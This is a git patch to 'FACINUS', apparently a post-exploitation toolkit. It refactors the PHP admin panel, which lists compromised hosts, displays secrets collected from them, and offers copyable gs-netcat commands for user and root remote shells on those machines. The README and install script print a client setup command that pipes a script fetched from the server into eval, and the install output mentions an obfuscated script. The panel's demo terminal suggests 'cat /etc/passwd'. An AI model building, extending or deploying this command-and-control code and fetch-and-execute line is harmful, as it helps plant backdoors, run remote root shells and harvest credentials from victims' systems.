From 43ebdd8b190537e20992e16f3c3af2abd07573d4 Mon Sep 17 00:00:00 2001
From: Amoelle <amoelle@proton.me>
Date: Wed, 9 Apr 2025 02:59:29 +0300
Subject: [PATCH] refactor handling web logs && fix issues

---
 README.md            |   2 +-
 install              |   2 +-
 web/admin.php        | 907 -------------------------------------------
 web/admin/admin.php  | 275 +++++++++++++
 web/admin/scripts.js |  63 +++
 web/admin/styles.css | 276 +++++++++++++
 web/index.html       |   2 +-
 web/log_receiver.php |   6 +-
 web/web_setup.sh     |  51 ++-
 9 files changed, 645 insertions(+), 939 deletions(-)
 delete mode 100644 web/admin.php
 create mode 100644 web/admin/admin.php
 create mode 100644 web/admin/scripts.js
 create mode 100644 web/admin/styles.css

diff --git a/README.md b/README.md
index 2d6689a..6e32b54 100644
--- a/README.md
+++ b/README.md
@@ -49,7 +49,7 @@ Obfuscated script created.
 Deployment server setup complete!
 ==============================================================
 Server URL: http://192.168.0.131/deployment
-Admin Page: http://192.168.0.131/deployment/admin.php
+Admin Page: http://192.168.0.131/deployment/admin/admin.php
 Admin Password: 2cn2lguMIdx9
 Client Setup Command: eval "$(curl -fsSL http://192.168.0.104/deployment/y)"
 ==============================================================
diff --git a/install b/install
index 9069322..73f5c84 100755
--- a/install
+++ b/install
@@ -47,7 +47,7 @@ echo "==============================================================
 Deployment server setup complete!
 ==============================================================
 Server URL: http://$SERVER_IP/deployment
-Admin Page: http://$SERVER_IP/deployment/admin.php
+Admin Page: http://$SERVER_IP/deployment/admin/admin.php
 Admin Password: $ADMIN_PASSWORD
 Client Setup Command: eval \"\$(wget -qO- http://$SERVER_IP/deployment/y)\"
 ==============================================================
diff --git a/web/admin.php b/web/admin.php
deleted file mode 100644
index 0659469..0000000
--- a/web/admin.php
+++ /dev/null
@@ -1,907 +0,0 @@
-<?php
-// FACINUS Admin Panel
-// This file allows viewing logs and connection information from deployed clients
-
-// Session and authentication
-session_start();
-$admin_password = "ADMIN_PASSWORD_PLACEHOLDER"; // Will be replaced during installation
-
-// Handle login
-if (isset($_POST['password'])) {
-    if ($_POST['password'] === $admin_password) {
-        $_SESSION['authenticated'] = true;
-    } else {
-        $login_error = "Invalid password";
-    }
-}
-
-// Handle logout
-if (isset($_GET['logout'])) {
-    session_destroy();
-    header("Location: " . $_SERVER['PHP_SELF']);
-    exit;
-}
-
-// Check authentication
-$authenticated = isset($_SESSION['authenticated']) && $_SESSION['authenticated'] === true;
-
-// Directories
-$logs_dir = __DIR__ . "/logs";
-$secrets_dir = __DIR__ . "/secrets";
-
-// Get list of hosts (each subdirectory in logs_dir is a host)
-$hosts = [];
-if ($authenticated && is_dir($logs_dir)) {
-    $dir_content = scandir($logs_dir);
-    foreach ($dir_content as $item) {
-        if ($item != "." && $item != ".." && is_dir($logs_dir . "/" . $item)) {
-            $hosts[] = $item;
-        }
-    }
-}
-
-// View specific log if requested
-$current_log = null;
-$log_content = "";
-if ($authenticated && isset($_GET['log'])) {
-    $log_path = $logs_dir . "/" . $_GET['host'] . "/" . $_GET['log'];
-    if (file_exists($log_path) && is_file($log_path)) {
-        $current_log = $_GET['log'];
-        $log_content = file_get_contents($log_path);
-    }
-}
-
-// View system info if requested
-$system_info = null;
-if ($authenticated && isset($_GET['info']) && $_GET['info'] === 'system') {
-    $info_path = $logs_dir . "/" . $_GET['host'] . "/system_info.json";
-    if (file_exists($info_path) && is_file($info_path)) {
-        $system_info = json_decode(file_get_contents($info_path), true);
-    }
-}
-
-// View secrets if requested
-$secrets = [];
-if ($authenticated && isset($_GET['secrets']) && $_GET['host']) {
-    $host_secrets_dir = $secrets_dir . "/" . $_GET['host'];
-    if (is_dir($host_secrets_dir)) {
-        $secret_files = scandir($host_secrets_dir);
-        foreach ($secret_files as $file) {
-            if ($file != "." && $file != ".." && is_file($host_secrets_dir . "/" . $file)) {
-                $type = pathinfo($file, PATHINFO_FILENAME);
-                $value = file_get_contents($host_secrets_dir . "/" . $file);
-                $secrets[$type] = $value;
-            }
-        }
-    }
-}
-
-// For gsocket shell access
-$shell_mode = false;
-if ($authenticated && isset($_GET['shell']) && $_GET['host']) {
-    $shell_mode = true;
-}
-
-// Get logs for a specific host if requested
-$host_logs = [];
-if ($authenticated && isset($_GET['host'])) {
-    $host_logs_dir = $logs_dir . "/" . $_GET['host'];
-    if (is_dir($host_logs_dir)) {
-        $log_files = scandir($host_logs_dir);
-        foreach ($log_files as $file) {
-            if ($file != "." && $file != ".." && is_file($host_logs_dir . "/" . $file)) {
-                $host_logs[] = $file;
-            }
-        }
-    }
-    // Sort logs by most recent first
-    usort($host_logs, function($a, $b) use ($logs_dir) {
-        return filemtime($logs_dir . "/" . $_GET['host'] . "/" . $b) - 
-               filemtime($logs_dir . "/" . $_GET['host'] . "/" . $a);
-    });
-}
-?>
-<!DOCTYPE html>
-<html lang="en">
-<head>
-    <meta charset="UTF-8">
-    <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>FACINUS - Admin</title>
-    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
-    <style>
-        :root {
-            --bg: #111111;
-            --text: #33ff33;
-            --text-dim: #1a991a;
-            --secondary: #aaaaaa;
-            --accent: #ff5555;
-            --border: #333333;
-            --hover: #222222;
-            --panel: #191919;
-        }
-        
-        * {
-            box-sizing: border-box;
-            margin: 0;
-            padding: 0;
-        }
-        
-        body {
-            font-family: 'Courier New', monospace;
-            background-color: var(--bg);
-            color: var(--text);
-            line-height: 1.5;
-        }
-        
-        .container {
-            width: 95%;
-            max-width: 1400px;
-            margin: 0 auto;
-            padding: 10px;
-        }
-        
-        .header {
-            border-bottom: 1px solid var(--border);
-            padding: 10px 0;
-            margin-bottom: 20px;
-            display: flex;
-            justify-content: space-between;
-            align-items: center;
-        }
-        
-        pre {
-            font-family: 'Courier New', monospace;
-            overflow-x: auto;
-            white-space: pre;
-        }
-        
-        .ascii-header {
-            font-size: 12px;
-            line-height: 1.2;
-        }
-        
-        .logout {
-            color: var(--text);
-            text-decoration: none;
-            border: 1px solid var(--border);
-            padding: 5px 10px;
-        }
-        
-        .logout:hover {
-            background: var(--hover);
-        }
-        
-        .dashboard {
-            display: flex;
-            gap: 20px;
-        }
-        
-        .sidebar {
-            width: 280px;
-            flex-shrink: 0;
-        }
-        
-        .content {
-            flex-grow: 1;
-        }
-        
-        .panel {
-            border: 1px solid var(--border);
-            background: var(--panel);
-            margin-bottom: 20px;
-        }
-        
-        .panel-header {
-            border-bottom: 1px solid var(--border);
-            padding: 10px;
-            display: flex;
-            justify-content: space-between;
-            align-items: center;
-        }
-        
-        .host-list, .log-list {
-            list-style: none;
-        }
-        
-        .host-list a, .log-list a, .tab {
-            display: block;
-            padding: 8px 10px;
-            color: var(--secondary);
-            text-decoration: none;
-            border-bottom: 1px solid var(--border);
-        }
-        
-        .host-list a:hover, .log-list a:hover, .tab:hover {
-            background: var(--hover);
-            color: var(--text);
-        }
-        
-        .host-list a.active, .log-list a.active, .tab.active {
-            color: var(--text);
-            background: rgba(51, 255, 51, 0.1);
-        }
-        
-        .tabs {
-            display: flex;
-            border-bottom: 1px solid var(--border);
-        }
-        
-        .tab {
-            padding: 8px 15px;
-            border-right: 1px solid var(--border);
-            border-bottom: none;
-        }
-        
-        .logs {
-            padding: 10px;
-            max-height: 600px;
-            overflow: auto;
-            white-space: pre-wrap;
-            font-family: 'Courier New', monospace;
-            font-size: 14px;
-            background: rgba(0, 0, 0, 0.2);
-        }
-        
-        .log-date {
-            float: right;
-            color: var(--text-dim);
-            font-size: 0.9em;
-        }
-        
-        .login {
-            max-width: 400px;
-            margin: 50px auto;
-            padding: 20px;
-            border: 1px solid var(--border);
-            background: var(--panel);
-        }
-        
-        input[type="password"] {
-            width: 100%;
-            padding: 8px;
-            margin: 10px 0;
-            background: var(--bg);
-            border: 1px solid var(--border);
-            color: var(--text);
-            font-family: 'Courier New', monospace;
-        }
-        
-        button, .button {
-            padding: 8px 15px;
-            background: transparent;
-            color: var(--text);
-            border: 1px solid var(--text);
-            cursor: pointer;
-            font-family: 'Courier New', monospace;
-            width: 100%;
-        }
-        
-        button:hover, .button:hover {
-            background: rgba(51, 255, 51, 0.1);
-        }
-        
-        .welcome {
-            text-align: center;
-            padding: 50px 20px;
-            color: var(--secondary);
-        }
-        
-        .secrets {
-            padding: 10px;
-            max-width: 800px;
-            margin: 0 auto;/
-        }
-
-        .secret {
-            margin-bottom: 15px;
-            padding: 8px;
-            border: 1px solid var(--border);
-            background: rgba(255, 255, 0, 0.05);
-            border-radius: 3px;
-        }
-
-        .secret-title {
-            margin-bottom: 8px;
-            border-bottom: 1px dashed var(--border);
-            padding-bottom: 4px;
-            font-size: 0.9em;
-            color: var(--text-dim);
-        }
-        
-        .command {
-            background: rgba(0, 0, 0, 0.3);
-            border: 1px solid var(--border);
-            padding: 10px;
-            margin: 10px 0;
-            position: relative;
-            overflow-x: auto;
-            white-space: pre;
-            font-family: 'Courier New', monospace;
-        }
-
-        .secret .command {
-            margin: 5px 0;
-            padding: 8px;
-            font-size: 0.9em;
-            line-height: 1.4;
-        }
-        
-        .copy-btn {
-            position: absolute;
-            right: 5px;
-            top: 5px;
-            background: transparent;
-            color: var(--secondary);
-            border: 1px solid var(--border);
-            padding: 2px 5px;
-            cursor: pointer;
-            font-size: 12px;
-            width: auto;
-            font-family: 'Courier New', monospace;
-        }
-        
-        .copy-btn:hover {
-            background: var(--hover);
-            color: var(--text);
-        }
-        
-        .alert {
-            border-left: 3px solid var(--accent);
-            padding: 10px;
-            margin-bottom: 15px;
-            color: var(--accent);
-        }
-        
-        .terminal {
-            height: 500px;
-            background: #000;
-            color: var(--text);
-            padding: 10px;
-            overflow: auto;
-            font-family: 'Courier New', monospace;
-            margin-top: 10px;
-        }
-        
-        .terminal-input {
-            background: transparent;
-            border: none;
-            color: var(--text);
-            width: 100%;
-            font-family: 'Courier New', monospace;
-            outline: none;
-            padding: 5px 0;
-        }
-        
-        .gs-command {
-            margin: 10px 0;
-        }
-        
-        .info-table {
-            width: 100%;
-            border-collapse: collapse;
-        }
-        
-        .info-table tr {
-            border-bottom: 1px solid var(--border);
-        }
-        
-        .info-table td {
-            padding: 8px 10px;
-        }
-        
-        .info-label {
-            color: var(--secondary);
-            width: 150px;
-        }
-        
-        @media (max-width: 800px) {
-            .dashboard {
-                flex-direction: column;
-            }
-            
-            .sidebar {
-                width: 100%;
-            }
-            
-            .ascii-header {
-                font-size: 10px;
-            }
-            
-            .tabs {
-                flex-wrap: wrap;
-            }
-        }
-    </style>
-</head>
-<body>
-    <div class="container">
-        <div class="header">
-            <div class="ascii-header">
-<pre>
-  █████▒▄▄▄       ▄████▄   ██▓ ███▄    █  █    ██   ██████ 
-▓██   ▒▒████▄    ▒██▀ ▀█  ▓██▒ ██ ▀█   █  ██  ▓██▒▒██    ▒ 
-▒████ ░▒██  ▀█▄  ▒▓█    ▄ ▒██▒▓██  ▀█ ██▒▓██  ▒██░░ ▓██▄   
-░▓█▒  ░░██▄▄▄▄██ ▒▓▓▄ ▄██▒░██░▓██▒  ▐▌██▒▓▓█  ░██░  ▒   ██▒
-░▒█░    ▓█   ▓██▒▒ ▓███▀ ░░██░▒██░   ▓██░▒▒█████▓ ▒██████▒▒
- ▒ ░    ▒▒   ▓▒█░░ ░▒ ▒  ░░▓  ░ ▒░   ▒ ▒ ░▒▓▒ ▒ ▒ ▒ ▒▓▒ ▒ ░
- ░       ▒   ▒▒ ░  ░  ▒    ▒ ░░ ░░   ░ ▒░░░▒░ ░ ░ ░ ░▒  ░ ░
- ░ ░     ░   ▒   ░         ▒ ░   ░   ░ ░  ░░░ ░ ░ ░  ░  ░  
-             ░  ░░ ░       ░           ░    ░           ░  
-                 ░                                         
-
- admin panel
-</pre>
-            </div>
-            <?php if ($authenticated): ?>
-                <a href="?logout=1" class="logout">logout</a>
-            <?php endif; ?>
-        </div>
-
-        <?php if (!$authenticated): ?>
-            <div class="login">
-                <h2>> login</h2>
-                <?php if (isset($login_error)): ?>
-                    <div class="alert"><?php echo $login_error; ?></div>
-                <?php endif; ?>
-                <form method="post">
-                    <label for="password">password:</label>
-                    <input type="password" id="password" name="password" required autofocus>
-                    <button type="submit">access</button>
-                </form>
-            </div>
-        <?php else: ?>
-            <div class="dashboard">
-                <div class="sidebar">
-                    <div class="panel">
-                        <div class="panel-header">
-                            <h3>> hosts</h3>
-                        </div>
-                        <?php if (count($hosts) > 0): ?>
-                            <ul class="host-list">
-                                <?php foreach ($hosts as $host): ?>
-                                    <li>
-                                        <a href="?host=<?php echo urlencode($host); ?>" class="<?php echo isset($_GET['host']) && $_GET['host'] === $host ? 'active' : ''; ?>">
-                                            <?php echo htmlspecialchars($host); ?>
-                                        </a>
-                                    </li>
-                                <?php endforeach; ?>
-                            </ul>
-                        <?php else: ?>
-                            <div class="welcome">
-                                <p>no connected hosts</p>
-                            </div>
-                        <?php endif; ?>
-                    </div>
-                </div>
-                
-                <div class="content">
-                    <?php if (isset($_GET['host'])): ?>
-                        <div class="panel">
-                            <div class="panel-header">
-                                <h2>> <?php echo htmlspecialchars($_GET['host']); ?></h2>
-                            </div>
-                            
-                            <div class="tabs">
-                                <a href="?host=<?php echo urlencode($_GET['host']); ?>" class="tab <?php echo !isset($_GET['info']) && !isset($_GET['secrets']) && !isset($_GET['shell']) ? 'active' : ''; ?>">
-                                    logs
-                                </a>
-                                <a href="?host=<?php echo urlencode($_GET['host']); ?>&info=system" class="tab <?php echo isset($_GET['info']) && $_GET['info'] === 'system' ? 'active' : ''; ?>">
-                                    system
-                                </a>
-                                <a href="?host=<?php echo urlencode($_GET['host']); ?>&secrets=1" class="tab <?php echo isset($_GET['secrets']) ? 'active' : ''; ?>">
-                                    secrets
-                                </a>
-                                <a href="?host=<?php echo urlencode($_GET['host']); ?>&shell=1" class="tab <?php echo isset($_GET['shell']) ? 'active' : ''; ?>">
-                                    shell
-                                </a>
-                            </div>
-                            
-                            <?php if (isset($_GET['shell'])): ?>
-                                <div style="padding: 10px;">
-                                    <h3>> gsocket shell access</h3>
-                                    <?php 
-                                        // Check for gsocket user and root secret files
-                                        $user_secret = "";
-                                        $root_secret = "";
-                                        if (isset($secrets['gsocket_user'])) {
-                                            $user_secret = $secrets['gsocket_user'];
-                                        }
-                                        if (isset($secrets['gsocket_root'])) {
-                                            $root_secret = $secrets['gsocket_root'];
-                                        }
-                                    ?>
-                                    
-                                    <?php if (!empty($user_secret) || !empty($root_secret)): ?>
-                                        <?php if (!empty($user_secret)): ?>
-                                            <div class="gs-command">
-                                                <p>> user session</p>
-                                                <div class="command">
-                                                    gs-netcat -s <?php echo htmlspecialchars($user_secret); ?> -i
-                                                    <button class="copy-btn" onclick="copyToClipboard(this)" data-clipboard="gs-netcat -s <?php echo htmlspecialchars($user_secret); ?> -i">
-                                                        copy
-                                                    </button>
-                                                </div>
-                                            </div>
-                                        <?php endif; ?>
-                                        
-                                        <?php if (!empty($root_secret)): ?>
-                                            <div class="gs-command">
-                                                <p>> root session</p>
-                                                <div class="command">
-                                                    gs-netcat -s <?php echo htmlspecialchars($root_secret); ?> -i
-                                                    <button class="copy-btn" onclick="copyToClipboard(this)" data-clipboard="gs-netcat -s <?php echo htmlspecialchars($root_secret); ?> -i">
-                                                        copy
-                                                    </button>
-                                                </div>
-                                            </div>
-                                        <?php endif; ?>
-                                        
-                                        <div class="terminal" id="terminal">
-                                            <p>$ terminal emulation (run gs-netcat commands above in your local terminal)</p>
-                                            <p>$ this web console serves as a visual example only</p>
-                                            <p>$ -------------------------------------------------------</p>
-                                            <div id="output"></div>
-                                            <div style="display: flex;">
-                                                <span>$</span>
-                                                <input type="text" class="terminal-input" id="terminalInput" autocomplete="off">
-                                            </div>
-                                        </div>
-                                    <?php else: ?>
-                                        <div class="welcome">
-                                            <p>no gsocket secrets collected from this host</p>
-                                        </div>
-                                    <?php endif; ?>
-                                </div>
-                            <?php elseif (isset($_GET['secrets'])): ?>
-                                <div class="secrets">
-                                    <?php if (count($secrets) > 0): ?>
-                                        <?php foreach ($secrets as $type => $value): ?>
-                                            <div class="secret">
-                                                <div class="secret-title">
-                                                    > <?php echo htmlspecialchars(str_replace('_', ' ', $type)); ?>
-                                                </div>
-                                                <div class="command">
-                                                    <?php echo htmlspecialchars($value); ?>
-                                                    <button class="copy-btn" onclick="copyToClipboard(this)" data-clipboard="<?php echo htmlspecialchars($value); ?>">
-                                                        copy
-                                                    </button>
-                                                </div>
-                                            </div>
-                                        <?php endforeach; ?>
-                                    <?php else: ?>
-                                        <div class="welcome">
-                                            <p>no secrets collected from this host</p>
-                                        </div>
-                                    <?php endif; ?>
-                                </div>
-                            <?php elseif (isset($_GET['info']) && $_GET['info'] === 'system'): ?>
-                                <div style="padding: 10px;">
-                                    <?php if ($system_info): ?>
-                                        <table class="info-table">
-                                            <?php foreach ($system_info as $key => $value): ?>
-                                                <tr>
-                                                    <td class="info-label"><?php echo htmlspecialchars(str_replace('_', ' ', $key)); ?></td>
-                                                    <td><?php echo htmlspecialchars($value); ?></td>
-                                                </tr>
-                                            <?php endforeach; ?>
-                                        </table>
-                                    <?php else: ?>
-                                        <div class="welcome">
-                                            <p>no system information collected</p>
-                                        </div>
-                                    <?php endif; ?>
-                                </div>
-                            <?php else: ?>
-                                <?php if ($current_log): ?>
-                                    <div class="logs">
-                                        <?php echo htmlspecialchars($log_content); ?>
-                                    </div>
-                                <?php elseif (count($host_logs) > 0): ?>
-                                    <ul class="log-list">
-                                        <?php foreach ($host_logs as $log): ?>
-                                            <?php 
-                                                $log_time = filemtime($logs_dir . "/" . $_GET['host'] . "/" . $log);
-                                                $log_date = date("Y-m-d H:i:s", $log_time);
-                                            ?>
-                                            <li>
-                                                <a href="?host=<?php echo urlencode($_GET['host']); ?>&log=<?php echo urlencode($log); ?>">
-                                                    <?php echo htmlspecialchars($log); ?>
-                                                    <span class="log-date"><?php echo $log_date; ?></span>
-                                                </a>
-                                            </li>
-                                        <?php endforeach; ?>
-                                    </ul>
-                                <?php else: ?>
-                                    <div class="welcome">
-                                        <p>no logs available</p>
-                                    </div>
-                                <?php endif; ?>
-                            <?php endif; ?>
-                        </div>
-                    <?php else: ?>
-                        <div class="welcome">
-                            <p>select a host to view details</p>
-                        </div>
-                    <?php endif; ?>
-                </div>
-            </div>
-        <?php endif; ?>
-    </div>
-
-    <script>
-        function copyToClipboard(element) {
-            const text = element.getAttribute('data-clipboard');
-            navigator.clipboard.writeText(text).then(function() {
-                const originalText = element.innerText;
-                element.innerText = "copied!";
-                setTimeout(() => {
-                    element.innerText = originalText;
-                }, 1000);
-            });
-        }
-        
-        // Simple terminal simulation
-        const terminalInput = document.getElementById('terminalInput');
-        const output = document.getElementById('output');
-        let commandHistory = [];
-        let commandIndex = -1;
-        
-        if (terminalInput) {
-            terminalInput.addEventListener('keydown', function(e) {
-                const terminal = document.getElementById('terminal');
-                
-                if (e.key === 'Enter') {
-                    e.preventDefault();
-                    const command = terminalInput.value;
-                    
-                    if (command.trim() !== '') {
-                        // Add command to history
-                        commandHistory.push(command);
-                        commandIndex = commandHistory.length;
-                        
-                        // Display command
-                        const cmdElement = document.createElement('p');
-                        cmdElement.innerHTML = `$ ${command}`;
-                        output.appendChild(cmdElement);
-                        
-                        // Simulate response (this is just a simulation)
-                        let response;
-                        if (command.toLowerCase().includes('ls')) {
-                            response = "index.html\nconfig.php\nassets/\n.hidden/";
-                        } else if (command.toLowerCase().includes('whoami')) {
-                            response = "www-data";
-                        } else if (command.toLowerCase().includes('pwd')) {
-                            response = "/var/www/html";
-                        } else if (command.toLowerCase().includes('help')) {
-                            response = "This is a simulated terminal. Use the gs-netcat command in your real terminal for actual access.";
-                        } else {
-                            response = `Command not found: ${command}`;
-                        }
-                        
-                        const resElement = document.createElement('p');
-                        resElement.textContent = response;
-                        output.appendChild(resElement);
-                        
-                        // Clear input
-                        terminalInput.value = '';
-                        
-                        // Scroll to bottom
-                        terminal.scrollTop = terminal.scrollHeight;
-                    }
-                } else if (e.key === 'ArrowUp') {
-                    // Navigate command history
-                    if (commandHistory.length > 0 && commandIndex > 0) {
-                        commandIndex--;
-                        terminalInput.value = commandHistory[commandIndex];
-                        // Move cursor to end
-                        setTimeout(() => {
-                            terminalInput.selectionStart = terminalInput.value.length;
-                            terminalInput.selectionEnd = terminalInput.value.length;
-                        }, 0);
-                    }
-                    e.preventDefault();
-                } else if (e.key === 'ArrowDown') {
-                    // Navigate command history
-                    if (commandIndex < commandHistory.length - 1) {
-                        commandIndex++;
-                        terminalInput.value = commandHistory[commandIndex];
-                    } else if (commandIndex >= commandHistory.length - 1) {
-                        commandIndex = commandHistory.length;
-                        terminalInput.value = '';
-                    }
-                    e.preventDefault();
-                } else if (e.key === 'Tab') {
-                    // Simple tab completion (just a demo)
-                    e.preventDefault();
-                    const cmd = terminalInput.value;
-                    
-                    if (cmd.startsWith('cd ')) {
-                        terminalInput.value = 'cd /var/www/';
-                    } else if (cmd.startsWith('cat ')) {
-                        terminalInput.value = 'cat /etc/passwd';
-                    }
-                }
-            });
-            
-            // Focus terminal input when terminal is clicked
-            const terminal = document.getElementById('terminal');
-            if (terminal) {
-                terminal.addEventListener('click', function() {
-                    terminalInput.focus();
-                });
-            }
-        }
-        
-        // Auto-refresh functionality for logs
-        const logContent = document.querySelector('.logs');
-        if (logContent) {
-            // Add refresh button
-            const refreshButton = document.createElement('button');
-            refreshButton.innerText = 'refresh';
-            refreshButton.className = 'copy-btn';
-            refreshButton.style.position = 'absolute';
-            refreshButton.style.top = '10px';
-            refreshButton.style.right = '10px';
-            
-            const panelHeader = document.querySelector('.panel-header');
-            if (panelHeader) {
-                panelHeader.style.position = 'relative';
-                panelHeader.appendChild(refreshButton);
-                
-                refreshButton.addEventListener('click', function() {
-                    // Reload the current page
-                    location.reload();
-                });
-            }
-        }
-        
-        // Live search functionality for hosts and logs
-        function addSearchBox(containerSelector, itemSelector) {
-            const container = document.querySelector(containerSelector);
-            if (!container) return;
-            
-            const searchBox = document.createElement('input');
-            searchBox.type = 'text';
-            searchBox.placeholder = 'search...';
-            searchBox.style.width = '100%';
-            searchBox.style.padding = '8px';
-            searchBox.style.margin = '0';
-            searchBox.style.background = 'var(--bg)';
-            searchBox.style.border = '1px solid var(--border)';
-            searchBox.style.borderWidth = '0 0 1px 0';
-            searchBox.style.color = 'var(--text)';
-            searchBox.style.fontFamily = "'Courier New', monospace";
-            
-            container.parentNode.insertBefore(searchBox, container);
-            
-            searchBox.addEventListener('input', function() {
-                const query = this.value.toLowerCase();
-                const items = document.querySelectorAll(itemSelector);
-                
-                items.forEach(item => {
-                    const text = item.textContent.toLowerCase();
-                    if (text.includes(query)) {
-                        item.style.display = 'block';
-                    } else {
-                        item.style.display = 'none';
-                    }
-                });
-            });
-        }
-        
-        // Add search boxes if lists exist
-        if (document.querySelector('.host-list')) {
-            addSearchBox('.host-list', '.host-list li a');
-        }
-        
-        if (document.querySelector('.log-list')) {
-            addSearchBox('.log-list', '.log-list li a');
-        }
-        
-        // Add a notification system
-        function createNotification(message, type = 'info') {
-            const notification = document.createElement('div');
-            notification.className = 'notification ' + type;
-            notification.innerHTML = message;
-            
-            notification.style.position = 'fixed';
-            notification.style.bottom = '20px';
-            notification.style.right = '20px';
-            notification.style.padding = '10px 15px';
-            notification.style.background = type === 'error' ? 'rgba(255, 85, 85, 0.2)' : 'rgba(51, 255, 51, 0.1)';
-            notification.style.border = '1px solid ' + (type === 'error' ? 'var(--accent)' : 'var(--text)');
-            notification.style.color = type === 'error' ? 'var(--accent)' : 'var(--text)';
-            notification.style.fontFamily = "'Courier New', monospace";
-            notification.style.zIndex = '1000';
-            notification.style.maxWidth = '300px';
-            notification.style.boxShadow = '0 2px 10px rgba(0,0,0,0.2)';
-            
-            document.body.appendChild(notification);
-            
-            setTimeout(() => {
-                notification.style.opacity = '0';
-                notification.style.transition = 'opacity 0.5s ease';
-                setTimeout(() => {
-                    document.body.removeChild(notification);
-                }, 500);
-            }, 3000);
-        }
-        
-        // Example notifications (uncomment to use)
-        // document.addEventListener('DOMContentLoaded', function() {
-        //    createNotification('Connected to new host: server-backup-01', 'info');
-        // });
-        
-        // Add download functionality for logs
-        if (logContent) {
-            const downloadButton = document.createElement('button');
-            downloadButton.innerText = 'download';
-            downloadButton.className = 'copy-btn';
-            downloadButton.style.position = 'absolute';
-            downloadButton.style.top = '10px';
-            downloadButton.style.right = '80px'; // Position next to refresh button
-            
-            const panelHeader = document.querySelector('.panel-header');
-            if (panelHeader) {
-                panelHeader.appendChild(downloadButton);
-                
-                downloadButton.addEventListener('click', function() {
-                    const content = logContent.innerText;
-                    const blob = new Blob([content], {type: 'text/plain'});
-                    const url = URL.createObjectURL(blob);
-                    
-                    const a = document.createElement('a');
-                    a.href = url;
-                    a.download = '<?php echo isset($_GET["log"]) ? $_GET["log"] : "log"; ?>';
-                    document.body.appendChild(a);
-                    a.click();
-                    document.body.removeChild(a);
-                    URL.revokeObjectURL(url);
-                    
-                    createNotification('Log file downloaded successfully', 'info');
-                });
-            }
-        }
-        
-        // Enable dark mode toggle
-        const darkModeToggle = document.createElement('button');
-        darkModeToggle.innerText = 'toggle theme';
-        darkModeToggle.className = 'copy-btn';
-        darkModeToggle.style.position = 'absolute';
-        darkModeToggle.style.top = '10px';
-        darkModeToggle.style.right = '100px';
-        darkModeToggle.style.display = 'none'; // Hidden by default, enable if you want this feature
-        
-        const header = document.querySelector('.header');
-        if (header) {
-            header.style.position = 'relative';
-            header.appendChild(darkModeToggle);
-            
-            darkModeToggle.addEventListener('click', function() {
-                const root = document.documentElement;
-                const currentBg = getComputedStyle(root).getPropertyValue('--bg').trim();
-                
-                if (currentBg === '#111111') {
-                    // Switch to light mode
-                    root.style.setProperty('--bg', '#f0f0f0');
-                    root.style.setProperty('--text', '#006600');
-                    root.style.setProperty('--text-dim', '#004d00');
-                    root.style.setProperty('--secondary', '#444444');
-                    root.style.setProperty('--border', '#cccccc');
-                    root.style.setProperty('--hover', '#e0e0e0');
-                    root.style.setProperty('--panel', '#ffffff');
-                } else {
-                    // Switch to dark mode
-                    root.style.setProperty('--bg', '#111111');
-                    root.style.setProperty('--text', '#33ff33');
-                    root.style.setProperty('--text-dim', '#1a991a');
-                    root.style.setProperty('--secondary', '#aaaaaa');
-                    root.style.setProperty('--border', '#333333');
-                    root.style.setProperty('--hover', '#222222');
-                    root.style.setProperty('--panel', '#191919');
-                }
-            });
-        }
-    </script>
-</body>
-</html>
diff --git a/web/admin/admin.php b/web/admin/admin.php
new file mode 100644
index 0000000..c0082df
--- /dev/null
+++ b/web/admin/admin.php
@@ -0,0 +1,275 @@
+<?php
+// FACINUS Admin Panel
+session_start();
+$admin_password = "ADMIN_PASSWORD_PLACEHOLDER"; // Will be replaced during installation
+
+// Handle login/logout
+if (isset($_POST['password'])) {
+    if ($_POST['password'] === $admin_password) {
+        $_SESSION['authenticated'] = true;
+    } else {
+        $login_error = "Invalid password";
+    }
+}
+
+if (isset($_GET['logout'])) {
+    session_destroy();
+    header("Location: " . $_SERVER['PHP_SELF']);
+    exit;
+}
+
+// Check authentication
+$authenticated = isset($_SESSION['authenticated']) && $_SESSION['authenticated'] === true;
+
+// Directories
+$logs_dir = __DIR__ . "/logs";
+$secrets_dir = __DIR__ . "/secrets";
+
+// Get list of hosts
+$hosts = [];
+if ($authenticated && is_dir($logs_dir)) {
+    $dir_content = scandir($logs_dir);
+    foreach ($dir_content as $item) {
+        if ($item != "." && $item != ".." && is_dir($logs_dir . "/" . $item)) {
+            $hosts[] = $item;
+        }
+    }
+}
+
+// View specific log if requested
+$current_log = null;
+$log_content = "";
+if ($authenticated && isset($_GET['log']) && isset($_GET['host'])) {
+    // Fix path traversal by sanitizing inputs
+    $host = basename($_GET['host']);
+    $log = basename($_GET['log']);
+    $log_path = $logs_dir . "/" . $host . "/" . $log;
+    if (file_exists($log_path) && is_file($log_path)) {
+        $current_log = $log;
+        $log_content = file_get_contents($log_path);
+    }
+}
+
+// View system info if requested
+$system_info = null;
+if ($authenticated && isset($_GET['info']) && $_GET['info'] === 'system' && isset($_GET['host'])) {
+    $host = basename($_GET['host']);
+    $info_path = $logs_dir . "/" . $host . "/system_info.json";
+    if (file_exists($info_path) && is_file($info_path)) {
+        $system_info = json_decode(file_get_contents($info_path), true);
+    }
+}
+
+// View secrets if requested
+$secrets = [];
+if ($authenticated && isset($_GET['secrets']) && isset($_GET['host'])) {
+    $host = basename($_GET['host']);
+    $host_secrets_dir = $secrets_dir . "/" . $host;
+    if (is_dir($host_secrets_dir)) {
+        $secret_files = scandir($host_secrets_dir);
+        foreach ($secret_files as $file) {
+            if ($file != "." && $file != ".." && is_file($host_secrets_dir . "/" . $file)) {
+                $type = pathinfo($file, PATHINFO_FILENAME);
+                $value = file_get_contents($host_secrets_dir . "/" . $file);
+                $secrets[$type] = $value;
+            }
+        }
+    }
+}
+
+$host_logs = [];
+if ($authenticated && isset($_GET['host'])) {
+    $host = basename($_GET['host']);
+    $host_logs_dir = $logs_dir . "/" . $host;
+    if (is_dir($host_logs_dir)) {
+        $log_files = scandir($host_logs_dir);
+        foreach ($log_files as $file) {
+            if ($file != "." && $file != ".." && is_file($host_logs_dir . "/" . $file)) {
+                $host_logs[] = $file;
+            }
+        }
+        // Sort logs by most recent first
+        usort($host_logs, function($a, $b) use ($host_logs_dir) {
+            $file_b = $host_logs_dir . "/" . $b;
+            $file_a = $host_logs_dir . "/" . $a;
+            
+            $time_b = file_exists($file_b) ? filemtime($file_b) : 0;
+            $time_a = file_exists($file_a) ? filemtime($file_a) : 0;
+            
+            return $time_b - $time_a;
+        });
+    }
+}
+?>
+<!DOCTYPE html>
